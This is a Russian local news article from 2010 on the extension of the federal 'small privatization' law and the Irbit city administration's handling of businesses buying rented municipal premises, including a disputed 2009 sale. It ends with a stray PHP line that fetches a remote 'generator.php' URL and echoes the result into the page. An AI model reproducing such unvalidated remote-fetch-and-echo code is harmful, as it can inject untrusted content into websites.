Регистрация нового пользоателя


Летний лагерь Салют 2010 год
Летний лагерь Салют 2010 год
Поправки в законодательство о продлении срока малой приватизации

2010-06-25 16:23:43
Поправки в законодательство о продлении срока малой приватизации

В среду, 16 июня, Государственная дума приняла в третьем чтении поправки в законодательство о продлении срока "малой приватизации". Согласно изменениям, вносимым в статью 10 федерального закона об особенностях отчуждения недвижимого имущества, находящегося в госсобственности субъектов РФ или в муниципальной собственности и арендуемого субъектами малого и среднего предпринимательства, малый и средний бизнес может выкупать арендуемые у государства и муниципалитетов площади до 1 июля 2013 года.


Изначально действие закона должно было завершиться уже 1 июля 2010 года. Но парламентарии прислушались к мнению экспертов, которые сошлись в том, что низкий уровень активности представителей по выкупу имущества (а за два года действия закона по всей России было выкуплено всего около восьми с половиной тысяч помещений) в первую очередь стал следствием сложного положения многих субъектов малого и среднего предпринимательства, вызванного кризисными явлениями в экономике страны.


Тем не менее, без изменений пока остаются два основных условия «малой приватизации»: имущество должно находиться в аренде более двух лет на момент начала действия закона, который был принят 22 июля 2008 года, а предельный срок рассрочки оплаты приобретаемого недвижимого имущества составляет 5 лет. Надо сказать, что в Свердловской области реализация закона тоже идет с большими проблемами. На сегодняшний день из порядка 900 объектов, которые арендуют субъекты малого и среднего бизнеса в нашем регионе, выкуплено всего 40. Особенно много вопросов о законности действий местных администраций возникает в Екатеринбурге, Нижнем Тагиле, Реже и Верхней Салде.


Упреки в адрес городских властей звучат и в Ирбите. Многочисленные обвинения в адрес администрации города о неправомерном противодействии предпринимателям города в их праве выкупа арендуемого имущества звучали из уст ирбитских депутатов – членов Свердловского областного отделения общественной организации «ОПОРА РОССИИ. Тем не менее, все необходимые мероприятия по реализации закона в Ирбите и проводятся в назначенные сроки и рассмотрение заявлений представителей малого и среднего бизнеса на выкуп идет без «лишних проволочек».
Чтобы не быть голословными приведем цифры. Всего в период действия закона в отдел муниципального имущества Администрации МО город Ирбит подано 32 заявления от предпринимателей, желающих принять участие в «малой приватизации». Из них три в 2010 году поданы повторно. Всего к настоящему моменту принято решение об удовлетворении 31 заявки и сейчас ведется работа по оценке продаваемых помещений и согласованию договоров купли-продажи.


Более того, оценив существующие потребности по выкупу имущества, в прошлом году глава города Геннадий Агафонов принял решение, которое было поддержано депутатами представительного органа: из утвержденного ранее Перечня муниципального имущества для поддержки субъектов малого и среднего  предпринимательства (имущества не подлежащего продаже) исключено девять объектов, которые сразу попали в план приватизации муниципального имущества и заявки на их выкуп в рамках действия федерального закона о «малой приватизации» уже рассмотрены.
Что касается причины единственного отказа в выкупе помещения, то и здесь, по словам представителей администрации никакого «политического» контекста нет. Данное помещение находится в цокальном этаже жилого дома и обеспечивает доступ ко всем его инженерным коммуникациям.


В настоящее время процесс идет полным ходом. В Федеральной регистрационной службе зарегистрировано уже 5  договоров купли-продажи муниципального имущества. Общая площадь выкупленных помещений – 911,1 кв.метров. При этом средняя стоимость одного квадратного метра  проданных объектов составила 24 925 рублей. А совокупная выгода местного бюджета от этих сделок перевалила за 20 миллионов рублей. Правда средства эти будут поступать в городской «кошелек» постепенно: все предприниматели воспользовались правом максимальной рассрочки платежей на пять лет, что и предусмотрено законом. Таким образом, в 2009 г. бюджет муниципалитета пополнился на 1 533 тысяч рублей, а в 2010 – на 1 512 тысяч.


Единственным «проблемным участком» в вопросе реализации 159-ФЗ в Ирбите остаются четыре договора купли-продажи, которые были заключены в марте прошлого года бывшим главой муниципалитета Андреем Гельмутом. Напомним читателям, что, вступив12 марта 2009  в должность главы Ирбита после своей победы на выборах, Геннадий Агафонов одним из первых своих решений отменил эту сделку. И вопрос, в первую очередь, возник по оценке стоимости реализованного имущества. Согласно договорам купли-продажи объектов, заключенным 06.03.2009 г., средняя стоимость 1 кв. метра составила 9 927 рублей, то есть, в два с половиной раза ниже рыночной оценки, проведенной администрацией после назначения действующего главы Муниципального образования.


Сейчас законность сделок рассматривается в Арбитражном суде Свердловской области. И согласно нашим сведениям, по результатам экспертизы, которая была проведена по требованию суда, стоимость объектов, указанная в договоре, действительно была существенно занижена. А какое решение по этому факту примет Арбитражный суд – узнаем в самое ближайшее время.




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>